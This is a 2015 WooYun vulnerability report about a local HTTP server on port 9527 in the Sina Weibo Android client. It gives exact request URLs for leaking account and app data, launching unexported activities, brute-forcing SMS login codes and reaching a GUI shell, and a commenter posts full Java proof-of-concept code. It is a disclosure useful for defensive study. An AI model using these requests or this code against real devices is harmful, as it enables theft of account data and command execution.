当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111534

漏洞标题:新浪微博android客户端本地提权

相关厂商:新浪

漏洞作者: 小荷才露尖尖角

提交时间:2015-05-01 18:53

修复时间:2015-07-31 08:08

公开时间:2015-07-31 08:08

漏洞类型:权限提升

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-01: 细节已通知厂商并且等待厂商处理中
2015-05-02: 厂商已经确认,细节仅向厂商公开
2015-05-05: 细节向第三方安全合作伙伴开放
2015-06-26: 细节向核心白帽子及相关领域专家公开
2015-07-06: 细节向普通白帽子公开
2015-07-16: 细节向实习白帽子公开
2015-07-31: 细节向公众公开

简要描述:

新浪微博某特性导致本地拒绝服务和权限提升

详细说明:

测试版本:新浪微博android客户端v5.2.80
0x01 简介
新浪微博android客户端实现了一个小型的HTTP Server,在手机本地地址的tcp9527端口监听,向该端口发送特定的HTTP请求时可返回部分敏感信息,启动未导出的Activity,造成拒绝服务,甚至允许本地攻击者获得一个GUI shell,以新浪微博客户端的用户权限执行任意命令。
0x02 漏洞分析
在com.sina.weibo.utils.weibohttpd.PushDaemon中可见新浪微博实现了一个小型的HTTP Server,该Server在原生层实现(加载libweibohttp.so),但HTTP请求解析在com.sina.weibo.utils.weibohttpd.a/b/c三个类中处理。
com.sina.weibo.utils.weibohttpd.a:
对HTTP请求的referer进行检查,并拆分字符串。referer不能匹配以下猥琐字符

weisuo.png


com.sina.weibo.utils.weibohttpd.b:
实现login命令查询,当HTTP请求为

http://127.0.0.1:9527/login?callback=xxx


时返回当前登录用户的信息。
com.sina.weibo.utils.weibohttpd.c:
(1)实现query命令查询,当HTTP请求为

http://127.0.0.1:9527/query?appid=packagename


可返回指定packagename的已安装应用信息,当packagename为com.sina.weibo时返回更为详尽的信息。
(2)实现si命令,发送intent。当HTTP请求为

http://127.0.0.1:9527/si?cmp=<pacakgename>_<componentname>&data=<url scheme>&act=<action name>

时,设置指定的intent,并传入startActivity函数。
见如下代码片段

label_13:
        if(v3.hasNext()) {
            Object v6 = v3.next();
            if("act".equals(v6)) {
                v4.setAction(v10.b.get(v6));
            }
            if("cmp".equals(v6)) {
                String[] v9 = v10.b.get(v6).split("_");
                if(v9 == null) {
                    goto label_39;
                }
                if(v9.length != 2) {
                    goto label_39;
                }
                v4.setComponent(new ComponentName(v9[0], v9[1]));
            }
        label_39:
            if("data".equals(v6)) {
                v4.setData(Uri.parse(v10.b.get(v6)));
            }
            if(!"callback".equals(v6)) {
                goto label_13;
            }
            Object v1_1 = v10.b.get(v6);
            goto label_13;
        }
        if((TextUtils.isEmpty(v4.getAction())) && v4.getComponent() == null && v4.getData() == null) {
            if(TextUtils.isEmpty(((CharSequence)v1))) {
                return "{\"result\":-20000}";
            }
            return this.a(v1, "{\"result\":-20000}");
        }
        List v0 = this.a.getPackageManager().queryIntentActivities(v4, 0);
        if(v0.size() == 0) {
            if(TextUtils.isEmpty(((CharSequence)v1))) {
                return "{\"result\":-10000}";
            }
            return this.a(v1, "{\"result\":-10000}");
        }
        try {
            this.a.startActivity(v4);
        }
        catch(Exception v11) {
        }
        v5 = v0.size() == 1 ? "{\"result\":200}" : "{\"result\":-40000}";
        if(!TextUtils.isEmpty(((CharSequence)v1))) {
            v5 = this.a(v1, v5);
        }
        return v5;


由于这里的intent主要是传入startActiviy,需要用户干预,危害并不大。但当packagename指定为com.sina.weibo自身,componentname指定为com.sina.weibo的activity时,可以启动新浪微博的任意activity,包括受保护的未导出activity,对安全造成影响。

漏洞证明:

1、查询当前登录用户信息

login_info.png


2、查询已安装应用信息(新浪微博)信息

packageinfo.png


3、启动未导出的Activity
(1)本地拒绝服务
大多数未导出activity启动时由于缺少参数,抛出异常,造成本地拒绝服务。

dos.png


(2)打开短信登录activity(5.2.0版本有效,新版本已删除)

smscodelogin.png


点击attack后进入这个页面

sms.png


该页面允许通过手机号和验证码登录。输入一指定用户的手机号,点击获取验证码后,随便输入验证码点击确认,用burp抓包使用intruder bruteforce,可以对6位验证码进行暴力破解尝试。测试中发现可以尝试1200次,然后服务端ban掉,因此有1200/1000000的暴力破解成功概率。
(3)打开工程模式,获取一个GUI Shell
启动com.sina.weibo.exlibs.NewProjectModeActivityPreLoading,可以得到新浪微博的工程模式设置

engmode.png


eng.png


注意图中的Run: api.weibo.cn,点击后可以得到一个GUI Shell,可以新浪微博用户的权限执行任意命令。

id.png


查看app私有目录下的文件

ls.png


可惜新浪微博一般为root权限运行,否则这就是一个好的root提权漏洞。当然不排除一些第三方ROM将新浪微博集成以高权限用户执行,造成更大的危害。

修复方案:

1、对HTTP请求进行检查,防止通过socket接口查询敏感信息和启动未导出的Activity
2、本地应用通信尽量不要采用socket这种方式,以防滥用。

版权声明:转载请注明来源 小荷才露尖尖角@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-05-02 08:07

厂商回复:

感谢关注新浪安全,安全问题修复中。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-01 18:59 | Nicky ( 普通白帽子 | Rank:477 漏洞数:69 | http://www.droidsec.cn 安卓安全中文站)

    关注

  2. 2015-05-01 19:13 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    弱弱问下洞主,iOS测试过么使用这个方法

  3. 2015-05-01 19:24 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    关注

  4. 2015-05-01 20:41 | Chora ( 普通白帽子 | Rank:337 漏洞数:22 | 生存、生活、生命。)

    关注大牛。

  5. 2015-05-01 21:52 | 小荷才露尖尖角 ( 实习白帽子 | Rank:91 漏洞数:13 | less is more)

    @’‘Nome iOS还没测试过

  6. 2015-05-02 00:19 | chavez_wang ( 路人 | Rank:0 漏洞数:1 | 走过你来时的路)

    关注

  7. 2015-05-05 14:44 | un10ad ( 路人 | Rank:4 漏洞数:1 | 我这个人不大会说话,有什么不对的地方你特...)

    来 我们请一位ID比较吊的同学来回答 .... 嗯...小荷才露尖尖角 你来

  8. 2015-05-10 11:51 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    等待公开。

  9. 2015-07-06 12:40 | hqdvista ( 普通白帽子 | Rank:154 漏洞数:31 | N/A)

    赞案例

  10. 2015-07-06 16:00 | Nicky ( 普通白帽子 | Rank:477 漏洞数:69 | http://www.droidsec.cn 安卓安全中文站)

    这个案例不错

  11. 2015-08-03 20:47 | 阿笑 ( 路人 | Rank:10 漏洞数:2 | 终于进来了啊!!!)

    public class MainActivity extends Activity { private final String[] m = {"com.sina.weibo.InterestProductList", "com.sina.weibo.WBArticalEditActivity", "com.sina.weibo.ShootingPopActivity", "com.sina.weibo.photoalbum.VideoAlbumActivity", "com.sina.weibo.photoalbum.camera.CameraActivity", "com.sina.weibo.photoalbum.camera.CameraAdapterActivity", "com.sina.weibo.photoalbum.video.VideoCutActivity", "com.sina.weibo.photoalbum.video.edit.VideoEditActivity", "com.sina.weibo.photoalbum.LocalVideoPlayerActivity", "com.sina.weibo.photoalbum.LocalVideoPlayerTempActivity", "com.sina.weibo.photoalbum.camera.CameraProxyActivity", "com.tencent.connect.common.AssistActivity", "com.sina.weibo.SmsCodeLoginActivity", "com.sina.weibo.SmsCodeLogin", "com.sina.weibo.UpdatePasswordActivity", "com.sina.weibo.UserLoginEntranceActivity", "com.sina.weibo.WaterMarkEditActivity", "com.sina.weibo.SettingsPref", "com.sina.weibo.SettingsMainActivity", "com.sina.weibo.SettingsLanguageActivity", "com.sina.weibo.page.FollowGroupSelectActivity", "com.sina.weibo.SettingsImageActivity", "com.sina.weibo.SettingsAudioActivity", "com.sina.weibo.SilentTimeActivity", "com.sina.weibo.RemindFrequencyActivity", "com.sina.weibo.RemindRelationActivity", "com.sina.weibo.weiyou.DMSingleChatActivity", "com.sina.weibo.MessageGroupMemberManageActivity", "com.sina.weibo.MessageGroupManageSizeActivity", "com.sina.weibo.weiyou.DMGroupChatActivity", "com.sina.weibo.weiyou.DMGroupNoticeActivity", "com.sina.weibo.weiyou.DMChatSettingActivity", "com.sina.weibo.AccountManager", "com.sina.weibo.weiyou.DMMessageMsgBoxActivity", "com.sina.weibo.MessageBoxSettingActivity", "com.sina.weibo.FriendCircleMembersAddSearchActivity", "com.sina.weibo.GroupMembersAddSearchActivity", "com.sina.weibo.page.MyInfoActivity2", "com.sina.weibo.page.MyInfoTabActivity", "com.sina.weibo.page.EditUserInfoActivity", "com.sina.weibo.page.EditUserWorkInfoActivity", "com.sina.weibo.page.EditUserEducationInfoActivity", "com.sina.weibo.FillInfoActivity", "com.sina.weibo.page.UserTopicAttentionList", "com.sina.weibo.browser.WeiboBrowser", "com.sina.weibo.browser.WeiboBrowserForGuide", "com.sina.weibo.ReadModeActivity", "com.sina.weibo.PrivacyAndSafeActivity", "com.sina.weibo.FontSizeSettingActivity", "com.weibo.mobileads.view.FlashAdActivity", "com.sina.weibo.ExceptionDialogActivity", "com.sina.weibo.PayConfirmOrderActivity", "com.sina.weibo.DomainRetriveActivity", "com.sina.weibo.MailRetriveActivity", "com.sina.weibo.AboutActivity", "com.sina.weibo.ChoiceActivity", "com.sina.weibo.MoreItemsActivity", "com.sina.weibo.AEditUserInfo", "com.sina.weibo.page.AEditText", "com.sina.weibo.RegisterHomeActivity", "com.sina.weibo.ForgetPwdActivity", "com.sina.weibo.RegisterSquareActivity", "com.sina.weibo.SkinPreviewActivity", "com.sina.weibo.MessageContactActivity", "com.sina.weibo.SearchGroupChatAndFansActivity", "com.sina.weibo.SSOLoginActivity", "com.sina.weibo.SSOAccountListActivity", "com.sina.weibo.SSOAuthorizeActivity", "com.sina.weibo.ProjectModeActivity", "com.sina.weibo.POIListActivity", "com.sina.weibo.ChooseShareScopeActivity", "com.sina.weibo.ChooseContactsInSearchActivity", "com.sina.weibo.photoalbum.PicFilterActivity", "com.sina.weibo.photoalbum.ImagePreviewActivity", "com.sina.weibo.photoalbum.PicCropActivity", "com.sina.weibo.photoalbum.Pic9cutCropActivity", "com.sina.weibo.Pic9cutGameActivity", "com.sina.weibo.UserGuideContactActivity", "com.sina.weibo.UserGuideCategoryDetail", "com.sina.weibo.photoalbum.FilterMarketActivity", "com.sina.weibo.photoalbum.VideoEffectStoreActivity", "com.sina.weibo.photoalbum.VideoMusicStoreActivity", "com.sina.weibo.EditSourceActivity", "com.sina.weibo.AttachAppManagementActivity", "com.sina.weibo.AttachAppDetailInfoActivity", "com.sina.weibo.FixedCarshActivity", "com.sina.weibo.NoNetActivity", "com.sina.weibo.LogFeedbackActivity", "com.sina.weibo.LogFeedbackUnicomActivity", "com.sina.weibo.WebWeiboActivity", "com.sina.weibo.DetailLogActivity", "com.sina.weibo.DetailLogItemActivity", "com.sina.weibo.SelectCountryActivity", "com.sina.weibo.VerificationCodeActivity", "com.sina.weibo.NewInterestPeopleActivity", "com.sina.weibo.YouMayKnowActivity", "com.sina.weibo.NewRegistContact", "com.sina.weibo.FriendCircleFeedGuideActivity", "com.sina.weibo.SpecialFollowFeedGuideActivity", "com.sina.weibo.HotCmtAndForwardActivity", "com.sina.weibo.QRCodeGuideActivity", "com.sina.weibo.InfoPageBackGuideActivity", "com.weibo.mobileads.view.AdActivity", "com.sina.qrcode.MyQRcodeActivity", "com.sina.popupad.PopupActivity", "com.sina.weibo.browser.InfoPageActivity", "com.sina.weibo.RemindSettingsActivity", "com.sina.weibo.RemindInnerSettingsActivity", "com.sina.weibo.RemindNoDisturbSettingsActivity", "com.sina.weibo.RemindSettingGuideActivity", "com.sina.weibo.MessageStrangerGuideActivity", "com.sina.weibo.page.SquareActivity", "com.sina.weibo.LikeListActivity", "com.sina.weibo.ContactsSearchResultActivity", "com.sina.weibo.PrivateSearchFanResultActivity", "com.sina.weibo.page.TopicSuggestionActivity", "com.sina.weibo.page.AtSuggestionActivity", "com.sina.weibo.AddFriendActivity", "com.sina.weibo.appmarket.activity.HomePageAppActivity", "com.sina.weibo.appmarket.activity.HomePageWeiGameActivity", "com.sina.weibo.appmarket.activity.DownloadMainActivity", "com.sina.weibo.appmarket.activity.WeiboDownloadAppActivity", "com.sina.weibo.appmarket.activity.SubjectActivity", "com.sina.weibo.appmarket.activity.SubjectDetailActivity", "com.sina.weibo.appmarket.activity.AppListActivity", "com.sina.weibo.appmarket.activity.AppSearchPageActivity", "com.sina.weibo.appmarket.activity.CategoryAppActivity", "com.sina.weibo.appmarket.activity.ReportActivity", "com.sina.weibo.appmarket.activity.AppIgnoredPageActivity", "com.sina.weibo.appmarket.activity.AppUpdatePageActivity", "com.sina.weibo.appmarket.activity.AppInstalledPageActivity", "com.sina.weibo.appmarket.activity.MyGamePageActivity", "com.sina.weibo.appmarket.activity.BigPicActivity", "com.sina.weibo.appmarket.shell.DialogActivity", "com.alipay.android.app.pay.MiniLaucherActivity", "com.alipay.android.app.ui.quickpay.window.MiniPayActivity", "com.alipay.android.app.ui.quickpay.window.MiniWebActivity", "com.alipay.sdk.auth.AuthActivity", "com.sina.weibo.terminal.TerminalActivity", "com.sina.weibo.terminal.Term", "com.sina.weibo.terminal.TermPreferences", "com.sina.memory.NewProjectModeActivity", "com.sina.weibo.exlibs.NewProjectModeActivityPreLoading", "com.sina.weibo.LogFileReadActivity", "com.facebook.LoginActivity", "com.sina.weibo.WeiboGuideActivity", "com.sina.weibo.GroupManageActivity", "com.sina.weibo.GroupMembersAddActivity", "com.sina.weibo.media.player.VideoPlayerActivity", "com.sina.weibo.media.player.MusicListActivity", "com.sina.weibo.page.MyGroupFollowersActivity", "com.sina.weibo.page.MyFollowersSearchActivity", "com.sina.weibo.page.MyGroupFollowSearchActivity", "com.sina.weibo.page.MyFollowSearchResultActivity", "com.sina.weibo.EggBoardActivity", "com.sina.weibo.SharePrivateMessageActivity", "com.sina.weibomonitor.view.ExDialog", "com.sina.weibo.NetWorkAnalyseActivity", "com.sina.weibo.VisitorMainTabActivity", "com.sina.weibo.VisitorOverseaSignUpActivity", "com.sina.weibo.VisitorGetAccountActivity", "com.sina.weibo.VisitorSignUpActivity", "com.sina.weibo.VisitorLoginActivity", "com.sina.weibo.LogFeedbackTrafficActivity", "com.sina.weibo.LogDnsListActivity", "com.sina.weibo.VisitorHomeActivity", "com.sina.weibo.VisitorSearchActivity", "com.sina.weibo.VisitorMoreActivity", "com.sina.weibo.VisitorMessageActivity", "com.sina.weibo.VisitorMeActivity", "com.sina.weibo.WaterMarkContentEditActivity", "com.sina.weibo.wbc.UploadQueueActivity", "com.sina.weibo.wlan.WifiAuthActivity", "com.sina.weibo.ShareModuleActivity", "com.sina.weibo.GroupAtSuggestionActivity", "com.sina.weibo.MyJoinGroupsManageActivity", "com.sina.weibo.MyJoinGroupListActivity", "com.sina.weibo.hc.DeviceListActivity", "com.sina.weibo.hc.DeviceDetailActivity", "com.sina.weibo.hc.HealthDataActivity", "com.sina.weibo.hc.HealthDevelopingActivity", "com.sina.weibo.hc.HealthUserPreviewActivity", "com.sina.weibo.hc.HealthUserSettingActivity", "com.sina.weibo.hc.tracking.TrackingActivity", "com.sina.weibo.hc.tracking.MyTrackListActivity"}; private TextView view, viewResult ; private Spinner spinner; private ArrayAdapter<String> adapter; private Button bt; private String uactivity = null; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); view = (TextView) findViewById(R.id.textView1); spinner = (Spinner) findViewById(R.id.Spinner01); bt = (Button)findViewById(R.id.request); bt.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { // TODO Auto-generated method stub if(uactivity != null) { // String stringUrl = "http://127.0.0.1:9527/si?cmp=com.sina.weibo_" + uactivity; // String stringUrl = "http://127.0.0.1:9527/login?callback=xxx"; String stringUrl = "http://127.0.0.1:9527/query?appid=com.sina.weibo"; ConnectivityManager connMgr = (ConnectivityManager) getSystemService(Context.CONNECTIVITY_SERVICE); NetworkInfo networkInfo = connMgr.getActiveNetworkInfo(); if (networkInfo != null && networkInfo.isConnected()) { new DownloadWebpageTask().execute(stringUrl); } else { viewResult.setText("No network connection available."); } } } }); viewResult = (TextView)findViewById(R.id.result); adapter = new ArrayAdapter<String>(this,android.R.layout.simple_spinner_item,m); adapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item); spinner.setAdapter(adapter); spinner.setOnItemSelectedListener(new SpinnerSelectedListener()); spinner.setVisibility(View.VISIBLE); } class SpinnerSelectedListener implements OnItemSelectedListener{ public void onItemSelected(AdapterView<?> arg0, View arg1, int arg2, long arg3) { view.setText("选择未导出Activity:\n"+m[arg2]); uactivity = m[arg2]; } public void onNothingSelected(AdapterView<?> arg0) { } } public class DownloadWebpageTask extends AsyncTask<String, Void, String> { @Override protected String doInBackground(String... urls) { // TODO Auto-generated method stub // params comes from the execute() call: params[0] is the url. try { return downloadUrl(urls[0]); } catch (IOException e) { return "Unable to retrieve web page. URL may be invalid."; } } @Override protected void onPostExecute(String result) { // TODO Auto-generated method stub viewResult.setText(result); } // Given a URL, establishes an HttpUrlConnection and retrieves // the web page content as a InputStream, which it returns as // a string. private String downloadUrl(String myurl) throws IOException { // Only display the first 500 characters of the retrieved // web page content. InputStream in = null; int len = 500; try { URL url = new URL(myurl); Log.d("heen","url is "+myurl); HttpURLConnection conn = (HttpURLConnection) url.openConnection(); conn.setRequestMethod("GET"); conn.setRequestProperty("referer", "http://www.sina.com"); conn.setDoInput(true); // Starts the query conn.connect(); String response = conn.getResponseMessage(); Log.d("heen", "The response is: " + response); in = conn.getInputStream(); String content = readIt(in, len); return content; // Makes sure that the InputStream is closed after the app is // finished using it. } catch(IOException ex) { ex.printStackTrace(); return null; } finally { if (in != null) { in.close(); } } } // Reads an InputStream and converts it to a String. public String readIt(InputStream stream, int len) throws IOException, UnsupportedEncodingException { Reader reader = null; reader = new InputStreamReader(stream, "UTF-8"); char[] buffer = new char[len]; reader.read(buffer); return new String(buffer); } } }

  12. 2015-08-03 20:48 | 阿笑 ( 路人 | Rank:10 漏洞数:2 | 终于进来了啊!!!)

    5wb送你了

  13. 2015-08-03 21:30 | 小荷才露尖尖角 ( 实习白帽子 | Rank:91 漏洞数:13 | less is more)

    @阿笑,感谢